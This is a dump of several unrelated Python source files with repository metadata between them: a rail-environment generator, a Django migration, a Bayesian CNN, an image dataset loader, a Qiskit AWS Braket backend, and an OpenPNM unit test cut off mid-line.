remove_agents_at_target=True ) obs = env.reset(random_seed = seed) break except ValueError as oErr: print("Error:", oErr) width += 5 height += 5 print("Try again with larger env: (w,h):", width, height) if not os.path.exists(sDir): os.makedirs(sDir) sfName = "{}/Level_{}.mpk".format(sDir, nTest) if os.path.exists(sfName): os.remove(sfName) env.save(sfName) sys.stdout.write(".") sys.stdout.flush() return env #env = create_test_env(RandomTestParams_small, 0, "train-envs-small/Test_0") def createEnvSet(nStart, nEnd, sDir, bSmall=True): #print("Generate small envs in train-envs-small:") print(f"Generate envs (small={bSmall}) in dir {sDir}:") sDirImages = "train-envs-small/images/" if not os.path.exists(sDirImages): os.makedirs(sDirImages) for test_id in range(nStart, nEnd, 1): env = create_test_env(RandomTestParams_small, test_id, sDir) oRender = RenderTool(env, gl="PILSVG") #oRender.env = env #oRender.set_new_rail() oRender.render_env() g2img = oRender.get_image() imgPIL = Image.fromarray(g2img) #imgPIL.show() imgPIL.save(sDirImages + "Level_{}.png".format(test_id)) # print("Generate large envs in train-envs-1000:") # for test_id in range(100): # create_test_env(RandomTestParams, test_id, "train-envs-1000/Test_0") def merge(sfEpisode, sfEnv, sfEnvOut, bJson=False): if bJson: with open(sfEpisode, "rb") as fEp: oActions = json.load(fEp) oEp = {"actions":oActions} print("json oEp:", type(oEp), list(oEp.keys())) else: with open(sfEpisode, "rb") as fEp: oEp = msgpack.load(fEp) print("oEp:", type(oEp), list(oEp.keys())) with open(sfEnv, "rb") as fEnv: oEnv = msgpack.load(fEnv) print("oEnv:", type(oEnv), list(oEnv.keys())) # merge dicts oEnv2 = {**oEp, **oEnv} print("Merged keys:", list(oEnv2.keys())) with open(sfEnvOut, "wb") as fEnv: msgpack.dump(oEnv2, fEnv) def printKeys1(sfEnv): with open(sfEnv, "rb") as fEnv: oEnv = msgpack.load(fEnv, encoding="utf-8") print(sfEnv, "keys:", list(oEnv.keys())) for sKey in oEnv.keys(): print("key", sKey, len(oEnv[sKey])) if sKey == "shape": print("shape: ", oEnv[sKey] ) def printKeys(sfEnvs): try: for sfEnv in sfEnvs: printKeys1(sfEnv) except: # assume single env printKeys1(sfEnvs) def main2(): parser = ap.ArgumentParser(description='Generate envs, merge episodes into env files.') parser.add_argument("-c", '--createEnvs', type=int, nargs=2, action="append", metavar=("nStart", "nEnd"), help='merge episode into env') parser.add_argument("-d", "--outDir", type=str, nargs=1, default="./test-envs-tmp") parser.add_argument("-m", '--merge', type=str, nargs=3, action="append", metavar=("episode", "env", "output_env"), help='merge episode into env') parser.add_argument("-j", '--mergejson', type=str, nargs=3, action="append", metavar=("json", "env", "output_env"), help='merge json actions into env, with key actions') parser.add_argument('-k', "--keys", type=str, action='append', nargs="+", help='print the keys in a file') args=parser.parse_args() print(args) if args.merge: print("merge:", args.merge) merge(*args.merge[0]) if args.mergejson: print("merge json:", args.mergejson) merge(*args.mergejson[0], bJson=True) if args.keys: print("keys:", args.keys) printKeys(args.keys[0]) if args.outDir: print("outDir", args.outDir) if args.createEnvs: print("create Envs - ", *args.createEnvs[0]) createEnvSet(*args.createEnvs[0], sDir=args.outDir) if __name__=="__main__": main2()
29.240876
96
0.623689
0
0
0
0
0
0
0
0
1,333
0.166375
fe2b48a6665b98787ac1bd205fe634201bd2120e
1,480
py
Python
job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py
Sruthi-Ganesh/postgres-django-queue
4ea8412c073ff8ceb0efbac48afc29456ae11346
[ "Apache-2.0" ]
null
null
null
job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py
Sruthi-Ganesh/postgres-django-queue
4ea8412c073ff8ceb0efbac48afc29456ae11346
[ "Apache-2.0" ]
null
null
null
job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py
Sruthi-Ganesh/postgres-django-queue
4ea8412c073ff8ceb0efbac48afc29456ae11346
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 2.2.4 on 2019-08-21 19:53 # this file is auto-generated so don't do flake8 on it # flake8: noqa from __future__ import absolute_import, unicode_literals from django.db import migrations, models import django.utils.timezone def copy_date_done_to_date_created(apps, schema_editor): TaskResult = apps.get_model('django_celery_results', 'taskresult') db_alias = schema_editor.connection.alias TaskResult.objects.using(db_alias).all().update( date_created=models.F('date_done') ) def reverse_copy_date_done_to_date_created(app, schema_editor): # the reverse of 'copy_date_done_to_date_created' is do nothing # because the 'date_created' will be removed. pass class Migration(migrations.Migration): dependencies = [ ('django_celery_results', '0005_taskresult_worker'), ] operations = [ migrations.AddField( model_name='taskresult', name='date_created', field=models.DateTimeField( auto_now_add=True, db_index=True, default=django.utils.timezone.now, help_text='Datetime field when the task result was created in UTC', verbose_name='Created DateTime' ), preserve_default=False, ), migrations.RunPython(copy_date_done_to_date_created, reverse_copy_date_done_to_date_created), ]
30.204082
83
0.664189
734
0.495946
0
0
0
0
0
0
439
0.296622
fe2bf5d430a026df243c522eca3e9b1d054d0492
45
py
Python
remediar/modules/http/__init__.py
fabaff/remediar
014d7733b00cd40a45881c2729c04df5584476e7
[ "Apache-2.0" ]
null
null
null
remediar/modules/http/__init__.py
fabaff/remediar
014d7733b00cd40a45881c2729c04df5584476e7
[ "Apache-2.0" ]
null
null
null
remediar/modules/http/__init__.py
fabaff/remediar
014d7733b00cd40a45881c2729c04df5584476e7
[ "Apache-2.0" ]
null
null
null
"""Support for HTTP or web server issues."""
22.5
44
0.688889
0
0
0
0
0
0
0
0
44
0.977778
fe2e74a698807b4b6d0cf881031198f5da548dd4
1,891
py
Python
Image Recognition/utils/BayesianModels/Bayesian3Conv3FC.py
AlanMorningLight/PyTorch-BayesianCNN
5de7133f09dd10135bf605efbdd26c18f2a4df13
[ "MIT" ]
1
2020-02-10T12:58:25.000Z
2020-02-10T12:58:25.000Z
utils/BayesianModels/Bayesian3Conv3FC.py
SulemanKhurram/ThesisExperiments
4fdf7b6558c87a096dcdc374c35085ac946d3a58
[ "MIT" ]
null
null
null
utils/BayesianModels/Bayesian3Conv3FC.py
SulemanKhurram/ThesisExperiments
4fdf7b6558c87a096dcdc374c35085ac946d3a58
[ "MIT" ]
null
null
null
import torch.nn as nn from utils.BBBlayers import BBBConv2d, BBBLinearFactorial, FlattenLayer class BBB3Conv3FC(nn.Module): """ Simple Neural Network having 3 Convolution and 3 FC layers with Bayesian layers. """ def __init__(self, outputs, inputs): super(BBB3Conv3FC, self).__init__() self.conv1 = BBBConv2d(inputs, 32, 5, stride=1, padding=2) self.soft1 = nn.Softplus() self.pool1 = nn.MaxPool2d(kernel_size=3, stride=2) self.conv2 = BBBConv2d(32, 64, 5, stride=1, padding=2) self.soft2 = nn.Softplus() self.pool2 = nn.MaxPool2d(kernel_size=3, stride=2) self.conv3 = BBBConv2d(64, 128, 5, stride=1, padding=1) self.soft3 = nn.Softplus() self.pool3 = nn.MaxPool2d(kernel_size=3, stride=2) self.flatten = FlattenLayer(2 * 2 * 128) self.fc1 = BBBLinearFactorial(2 * 2 * 128, 1000) self.soft5 = nn.Softplus() self.fc2 = BBBLinearFactorial(1000, 1000) self.soft6 = nn.Softplus() self.fc3 = BBBLinearFactorial(1000, outputs) layers = [self.conv1, self.soft1, self.pool1, self.conv2, self.soft2, self.pool2, self.conv3, self.soft3, self.pool3, self.flatten, self.fc1, self.soft5, self.fc2, self.soft6, self.fc3] self.layers = nn.ModuleList(layers) def probforward(self, x): 'Forward pass with Bayesian weights' kl = 0 for layer in self.layers: if hasattr(layer, 'convprobforward') and callable(layer.convprobforward): x, _kl, = layer.convprobforward(x) kl += _kl elif hasattr(layer, 'fcprobforward') and callable(layer.fcprobforward): x, _kl, = layer.fcprobforward(x) kl += _kl else: x = layer(x) logits = x return logits, kl
35.679245
89
0.599683
1,796
0.949762
0
0
0
0
0
0
169
0.089371
fe2fc61a568a0e2538b7b1f99349a5186a485475
8,657
py
Python
custom_scripts/load_animals.py
nphilou/influence-release
bcf3603705b6ff172bcb62123aef0248afa77a05
[ "MIT" ]
null
null
null
custom_scripts/load_animals.py
nphilou/influence-release
bcf3603705b6ff172bcb62123aef0248afa77a05
[ "MIT" ]
null
null
null
custom_scripts/load_animals.py
nphilou/influence-release
bcf3603705b6ff172bcb62123aef0248afa77a05
[ "MIT" ]
null
null
null
import os from tensorflow.contrib.learn.python.learn.datasets import base import numpy as np import IPython from subprocess import call from keras.preprocessing import image from influence.dataset import DataSet from influence.inception_v3 import preprocess_input BASE_DIR = 'data' # TODO: change def fill(X, Y, idx, label, img_path, img_side): img = image.load_img(img_path, target_size=(img_side, img_side)) x = image.img_to_array(img) X[idx, ...] = x Y[idx] = label def extract_and_rename_animals(): class_maps = [ ('dog', 'n02084071'), ('cat', 'n02121808'), ('bird', 'n01503061'), ('fish', 'n02512053'), ('horse', 'n02374451'), ('monkey', 'n02484322'), ('zebra', 'n02391049'), ('panda', 'n02510455'), ('lemur', 'n02496913'), ('wombat', 'n01883070'), ] for class_string, class_id in class_maps: class_dir = os.path.join(BASE_DIR, class_string) print(class_dir) call('mkdir %s' % class_dir, shell=True) call('tar -xf %s.tar -C %s' % (os.path.join(BASE_DIR, class_id), class_dir), shell=True) for filename in os.listdir(class_dir): file_idx = filename.split('_')[1].split('.')[0] src_filename = os.path.join(class_dir, filename) dst_filename = os.path.join(class_dir, '%s_%s.JPEG' % (class_string, file_idx)) os.rename(src_filename, dst_filename) def load_animals(num_train_ex_per_class=300, num_test_ex_per_class=100, num_valid_ex_per_class=0, classes=None, ): num_channels = 3 img_side = 299 if num_valid_ex_per_class == 0: valid_str = '' else: valid_str = '_valid-%s' % num_valid_examples if classes is None: classes = ['dog', 'cat', 'bird', 'fish', 'horse', 'monkey', 'zebra', 'panda', 'lemur', 'wombat'] data_filename = os.path.join(BASE_DIR, 'dataset_train-%s_test-%s%s.npz' % (num_train_ex_per_class, num_test_ex_per_class, valid_str)) else: data_filename = os.path.join(BASE_DIR, 'dataset_%s_train-%s_test-%s%s.npz' % ('-'.join(classes), num_train_ex_per_class, num_test_ex_per_class, valid_str)) num_classes = len(classes) num_train_examples = num_train_ex_per_class * num_classes num_test_examples = num_test_ex_per_class * num_classes num_valid_examples = num_valid_ex_per_class * num_classes if os.path.exists(data_filename): print('Loading animals from disk...') f = np.load(data_filename) X_train = f['X_train'] X_test = f['X_test'] Y_train = f['Y_train'] Y_test = f['Y_test'] if 'X_valid' in f: X_valid = f['X_valid'] else: X_valid = None if 'Y_valid' in f: Y_valid = f['Y_valid'] else: Y_valid = None else: print('Reading animals from raw images...') X_train = np.zeros([num_train_examples, img_side, img_side, num_channels]) X_test = np.zeros([num_test_examples, img_side, img_side, num_channels]) # X_valid = np.zeros([num_valid_examples, img_side, img_side, num_channels]) X_valid = None Y_train = np.zeros([num_train_examples]) Y_test = np.zeros([num_test_examples]) # Y_valid = np.zeros([num_valid_examples]) Y_valid = None for class_idx, class_string in enumerate(classes): print('class: %s' % class_string) # For some reason, a lot of numbers are skipped. i = 0 num_filled = 0 while num_filled < num_train_ex_per_class: img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i)) print(img_path) if os.path.exists(img_path): fill(X_train, Y_train, num_filled + (num_train_ex_per_class * class_idx), class_idx, img_path, img_side) num_filled += 1 print(num_filled) i += 1 num_filled = 0 while num_filled < num_test_ex_per_class: img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i)) if os.path.exists(img_path): fill(X_test, Y_test, num_filled + (num_test_ex_per_class * class_idx), class_idx, img_path, img_side) num_filled += 1 print(num_filled) i += 1 num_filled = 0 while num_filled < num_valid_ex_per_class: img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i)) if os.path.exists(img_path): fill(X_valid, Y_valid, num_filled + (num_valid_ex_per_class * class_idx), class_idx, img_path, img_side) num_filled += 1 print(num_filled) i += 1 X_train = preprocess_input(X_train) X_test = preprocess_input(X_test) X_valid = preprocess_input(X_valid) np.random.seed(0) permutation_idx = np.arange(num_train_examples) np.random.shuffle(permutation_idx) X_train = X_train[permutation_idx, :] Y_train = Y_train[permutation_idx] permutation_idx = np.arange(num_test_examples) np.random.shuffle(permutation_idx) X_test = X_test[permutation_idx, :] Y_test = Y_test[permutation_idx] permutation_idx = np.arange(num_valid_examples) np.random.shuffle(permutation_idx) X_valid = X_valid[permutation_idx, :] Y_valid = Y_valid[permutation_idx] np.savez_compressed(data_filename, X_train=X_train, Y_train=Y_train, X_test=X_test, Y_test=Y_test, X_valid=X_valid, Y_valid=Y_valid) train = DataSet(X_train, Y_train) if (X_valid is not None) and (Y_valid is not None): # validation = DataSet(X_valid, Y_valid) validation = None else: validation = None test = DataSet(X_test, Y_test) return base.Datasets(train=train, validation=validation, test=test) def load_koda(): num_channels = 3 img_side = 299 data_filename = os.path.join(BASE_DIR, 'dataset_koda.npz') if os.path.exists(data_filename): print('Loading Koda from disk...') f = np.load(data_filename) X = f['X'] Y = f['Y'] else: # Returns all class 0 print('Reading Koda from raw images...') image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg'))] # Hack to get the image files in the right order # image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and not image_file.startswith('124'))] # image_files += [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and image_file.startswith('124'))] num_examples = len(image_files) X = np.zeros([num_examples, img_side, img_side, num_channels]) Y = np.zeros([num_examples]) class_idx = 0 for counter, image_file in enumerate(image_files): img_path = os.path.join(BASE_DIR, 'koda', image_file) fill(X, Y, counter, class_idx, img_path, img_side) X = preprocess_input(X) np.savez(data_filename, X=X, Y=Y) return X, Y def load_dogfish_with_koda(): classes = ['dog', 'fish'] X_test, Y_test = load_koda() data_sets = load_animals(num_train_ex_per_class=900, num_test_ex_per_class=300, num_valid_ex_per_class=0, classes=classes) train = data_sets.train validation = data_sets.validation test = DataSet(X_test, Y_test) return base.Datasets(train=train, validation=validation, test=test) def load_dogfish_with_orig_and_koda(): classes = ['dog', 'fish'] X_test, Y_test = load_koda() X_test = np.reshape(X_test, (X_test.shape[0], -1)) data_sets = load_animals(num_train_ex_per_class=900, num_test_ex_per_class=300, num_valid_ex_per_class=0, classes=classes) train = data_sets.train validation = data_sets.validation test = DataSet( np.concatenate((data_sets.test.x, X_test), axis=0), np.concatenate((data_sets.test.labels, Y_test), axis=0)) return base.Datasets(train=train, validation=validation, test=test)
35.479508
167
0.611644
0
0
0
0
0
0
0
0
1,301
0.150283
fe2fd1a403e44db33fca9bd236a441a4df247ba1
13,000
py
Python
src/qiskit_aws_braket_provider/awsbackend.py
carstenblank/qiskit-aws-braket-provider
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
[ "Apache-2.0" ]
7
2020-09-25T17:16:54.000Z
2021-05-20T10:42:52.000Z
src/qiskit_aws_braket_provider/awsbackend.py
carstenblank/qiskit-aws-braket-provider
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
[ "Apache-2.0" ]
4
2020-09-21T19:33:39.000Z
2020-09-22T12:21:11.000Z
src/qiskit_aws_braket_provider/awsbackend.py
carstenblank/qiskit-aws-braket-provider
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
[ "Apache-2.0" ]
1
2020-09-21T19:32:16.000Z
2020-09-21T19:32:16.000Z
# Copyright 2020 Carsten Blank # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import logging from datetime import datetime, timedelta from braket.device_schema.device_service_properties_v1 import DeviceCost from typing import List, Dict, Optional, Any, Union, Tuple from botocore.response import StreamingBody from braket.aws import AwsDevice, AwsQuantumTask, AwsSession from braket.circuits import Circuit from braket.device_schema import DeviceCapabilities from braket.device_schema.ionq import IonqDeviceCapabilities from braket.device_schema.rigetti import RigettiDeviceCapabilities from braket.device_schema.simulators import GateModelSimulatorDeviceCapabilities from qiskit.providers import BaseBackend, JobStatus from qiskit.providers.models import QasmBackendConfiguration, BackendProperties, BackendStatus from qiskit.qobj import QasmQobj from . import awsjob from . import awsprovider from .conversions_configuration import aws_device_2_configuration from .conversions_properties import aws_ionq_to_properties, aws_rigetti_to_properties, aws_simulator_to_properties from .transpilation import convert_qasm_qobj logger = logging.getLogger(__name__) class AWSBackend(BaseBackend): _aws_device: AwsDevice _configuration: QasmBackendConfiguration _provider: 'awsprovider.AWSProvider' def __init__(self, aws_device: AwsDevice, provider: 'awsprovider.AWSProvider' = None): super().__init__(aws_device_2_configuration(aws_device), provider) self._aws_device = aws_device self._run = aws_device.run def properties(self) -> BackendProperties: properties: DeviceCapabilities = self._aws_device.properties if isinstance(properties, IonqDeviceCapabilities): return aws_ionq_to_properties(properties, self._configuration) if isinstance(properties, RigettiDeviceCapabilities): return aws_rigetti_to_properties(properties, self._configuration) if isinstance(properties, GateModelSimulatorDeviceCapabilities): return aws_simulator_to_properties(properties, self._configuration) def status(self) -> BackendStatus: # now = datetime.now() # windows = self._aws_device.properties.service.executionWindows # is_in_execution_window = windows. status: str = self._aws_device.status backend_status: BackendStatus = BackendStatus( backend_name=self.name(), backend_version=self.version(), operational=False, pending_jobs=0, # TODO status_msg=status ) if status == 'ONLINE': backend_status.operational = True elif status == 'OFFLINE': backend_status.operational = False else: backend_status.operational = False return backend_status def _get_job_data_s3_folder(self, job_id): return f"results-{self.name()}-{job_id}" @staticmethod def _exists_file(s3_client, s3_bucket: str, file: str): result: dict = s3_client.list_objects_v2( Bucket=s3_bucket, Prefix=file ) # TODO: error handling return result['KeyCount'] != 0 def _save_job_task_arns(self, job_id: str, task_arns: List[str], s3_bucket: Optional[str] = None) -> AwsSession.S3DestinationFolder: used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json' if AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does already exist in the bucket {used_s3_bucket}") result = s3_client.put_object(Body=json.dumps(task_arns).encode(), Bucket=used_s3_bucket, Key=file) # TODO: error handling return used_s3_bucket, self._get_job_data_s3_folder(job_id=job_id) def _delete_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None): used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json' if not AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling def _load_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None) -> List[str]: used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json' if not AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling streaming_body: StreamingBody = result['Body'] data: bytes = streaming_body.read() task_arns = json.loads(data.decode()) return task_arns def _save_job_data_s3(self, qobj: QasmQobj, s3_bucket: Optional[str] = None, extra_data: Optional[dict] = None) -> AwsSession.S3DestinationFolder: used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=qobj.qobj_id)}/qiskit_qobj_data.json' if AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' already exists at the bucket {used_s3_bucket}") body = { 'qobj_id': qobj.qobj_id, 'qobj': qobj.to_dict() } if extra_data: body['extra_data'] = extra_data result = s3_client.put_object(Body=json.dumps(body).encode(), Bucket=used_s3_bucket, Key=file) # TODO: error handling return used_s3_bucket, self._get_job_data_s3_folder(job_id=qobj.qobj_id) def _delete_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None): used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json' if not AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling def _load_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None) -> Tuple[QasmQobj, dict]: used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json' if not AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling streaming_body: StreamingBody = result['Body'] data: bytes = streaming_body.read() stored_experiment_data = json.loads(data.decode()) assert 'qobj' in stored_experiment_data qobj_raw = stored_experiment_data['qobj'] qobj = QasmQobj.from_dict(qobj_raw) extra_data = stored_experiment_data.get('extra_data', {}) return qobj, extra_data def _create_task(self, job_id: str, qc: Circuit, shots: int, s3_bucket: Optional[str] = None) -> AwsQuantumTask: used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket() task: AwsQuantumTask = self._aws_device.run( task_specification=qc, s3_destination_folder=(used_s3_bucket, self._get_job_data_s3_folder(job_id)), shots=shots ) return task def jobs( self, limit: int = 10, skip: int = 0, status: Optional[Union[JobStatus, str, List[Union[JobStatus, str]]]] = None, job_name: Optional[str] = None, start_datetime: Optional[datetime] = None, end_datetime: Optional[datetime] = None, job_tags: Optional[List[str]] = None, job_tags_operator: Optional[str] = "OR", descending: bool = True, db_filter: Optional[Dict[str, Any]] = None ) -> List['awsjob.AWSJob']: # TODO: use job tags as meta data on s3, else use the method of active_jobs pass def active_jobs(self, limit: int = 10) -> List['awsjob.AWSJob']: client = self._provider._aws_session.braket_client task_arns = [] nextToken = 'init' while nextToken is not None: result: dict = client.search_quantum_tasks( filters=[{ 'name': self.name(), 'operator': 'EQUAL', 'values': ['CREATED', 'QUEUED', 'RUNNING'] } ], maxResults=limit, nextToken=None if nextToken == 'init' or nextToken is None else nextToken ) # TODO: build all task_arns, query s3 for all keys with task_arns.json, see to which task a job associated, load the jobs via job_id pass def retrieve_job(self, job_id: str, s3_bucket: Optional[str] = None) -> 'awsjob.AWSJob': qobj, extra_data = self._load_job_data_s3(job_id=job_id, s3_bucket=s3_bucket) arns = self._load_job_task_arns(job_id=job_id, s3_bucket=s3_bucket) tasks = [AwsQuantumTask(arn=arn) for arn in arns] job = awsjob.AWSJob( job_id=job_id, qobj=qobj, tasks=tasks, extra_data=extra_data, s3_bucket=s3_bucket, backend=self ) return job def estimate_costs(self, qobj: QasmQobj) -> Optional[float]: shots = qobj.config.shots no_experiments = len(qobj.experiments) cost: DeviceCost = self._aws_device.properties.service.deviceCost if cost.unit == 'shot': return shots * no_experiments * cost.price elif cost.unit == 'hour': time_per_experiment = timedelta(seconds=10) # TODO: make this a better estimate: depends on no_qubits and depth total_time = shots * no_experiments * time_per_experiment return total_time.total_seconds() / 60 / 60 * cost.price else: return None def run(self, qobj: QasmQobj, s3_bucket: Optional[str] = None, extra_data: Optional[dict] = None): # If we get here, then we can continue with running, else ValueError! circuits: List[Circuit] = list(convert_qasm_qobj(qobj)) shots = qobj.config.shots tasks: List[AwsQuantumTask] = [] try: s3_location: AwsSession.S3DestinationFolder = self._save_job_data_s3(qobj, s3_bucket=s3_bucket, extra_data=extra_data) for circuit in circuits: task = self._aws_device.run( task_specification=circuit, s3_destination_folder=s3_location, shots=shots ) tasks.append(task) task_arns = [t.id for t in tasks] self._save_job_task_arns(job_id=qobj.qobj_id, task_arns=task_arns, s3_bucket=s3_location[0]) except Exception as ex: logger.error(f'During creation of tasks an error occurred: {ex}') logger.error(f'Cancelling all tasks {len(tasks)}!') for task in tasks: logger.error(f'Attempt to cancel {task.id}...') task.cancel() logger.error(f'State of {task.id}: {task.state()}.') self._delete_job_task_arns(qobj.qobj_id, s3_bucket=s3_bucket) self._delete_job_data_s3(qobj.qobj_id, s3_bucket=s3_bucket) raise ex job = awsjob.AWSJob( job_id=qobj.qobj_id, qobj=qobj, tasks=tasks, extra_data=extra_data, s3_bucket=s3_location[0], backend=self ) return job
45.138889
144
0.666923
11,324
0.871077
0
0
257
0.019769
0
0
2,461
0.189308
fe2ffb0cf28c08ae4282aa561c6f775796ff339b
14,564
py
Python
test/unit/Algorithms/GenericLinearTransportTest.py
thirtywang/OpenPNM
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
[ "MIT" ]
null
null
null
test/unit/Algorithms/GenericLinearTransportTest.py
thirtywang/OpenPNM
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
[ "MIT" ]
null
null
null
test/unit/Algorithms/GenericLinearTransportTest.py
thirtywang/OpenPNM
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
[ "MIT" ]
1
2020-07-02T02:21:10.000Z
2020-07-02T02:21:10.000Z
import OpenPNM import numpy as np import OpenPNM.Physics.models as pm class GenericLinearTransportTest: def setup_class(self): self.net = OpenPNM.Network.Cubic(shape=[5, 5, 5]) self.phase = OpenPNM.Phases.GenericPhase(network=self.net) Ps = self.net.Ps Ts = self.net.Ts self.phys = OpenPNM.Physics.GenericPhysics(network=self.net, phase=self.phase, pores=Ps, throats=Ts) self.phys['throat.cond'] = 5e-8 self.alg = OpenPNM.Algorithms.GenericLinearTransport(network=self.net, phase=self.phase) def test_set_BC_modes_pores(self): BC1_pores = np.arange(25, 35) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC1_pores) ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == BC1_pores) BC2_pores = np.arange(43, 50) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC2_pores, mode='merge') ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == np.concatenate((BC1_pores, BC2_pores))) BC3_pores = np.arange(4, 9) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC3_pores, mode='overwrite') ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == BC3_pores) BC4_pores = [11, 90] self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, pores=BC4_pores, mode='overwrite') ptest = self.alg.pores('pore.Neumann') assert np.all(ptest == BC4_pores) self.alg.set_boundary_conditions(bctype='Dirichlet', pores=BC1_pores, bcvalue=0.3) ptest = self.alg.pores('pore.Dirichlet') self.alg.set_boundary_conditions(bctype='Dirichlet', pores=self.alg.Ps, mode='remove') Dp = np.sum(self.alg['pore.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'pore.Neumann' assert (label not in self.alg.labels()) def test_set_BC_modes_throats(self): BC1_throats = np.arange(25, 35) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC1_throats) t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == BC1_throats) BC2_throats = np.arange(43, 50) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC2_throats, mode='merge') t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == np.concatenate((BC1_throats, BC2_throats))) BC3_throats = np.arange(4, 9) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC3_throats, mode='overwrite') t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == BC3_throats) BC4_throats = [11, 90] self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, throats=BC4_throats, mode='overwrite') t_test = self.alg.throats('throat.Neumann') assert np.all(t_test == BC4_throats) self.alg.set_boundary_conditions(bctype='Dirichlet', throats=BC1_throats, bcvalue=0.3) t_test = self.alg.throats('throat.Dirichlet') self.alg.set_boundary_conditions(bctype='Dirichlet', throats=self.alg.Ts, mode='remove') Dp = np.sum(self.alg['throat.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'throat.Neumann' assert (label not in self.alg.labels()) def test_set_BC_modes_with_boolean_masks_pores(self): BC1_pores = np.zeros(self.alg.Np, dtype='bool') BC1_pores[np.arange(25, 35)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC1_pores) ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == self.alg._parse_locations(BC1_pores)) BC2_pores = np.zeros(self.alg.Np, dtype='bool') BC2_pores[np.arange(43, 50)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC2_pores, mode='merge') ptest = self.alg.pores('pore.Dirichlet') B1 = self.alg._parse_locations(BC1_pores) B2 = self.alg._parse_locations(BC2_pores) assert np.all(ptest == np.concatenate((B1, B2))) BC3_pores = np.zeros(self.alg.Np, dtype='bool') BC3_pores[np.arange(4, 9)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC3_pores, mode='overwrite') ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == self.alg._parse_locations(BC3_pores)) BC4_pores = 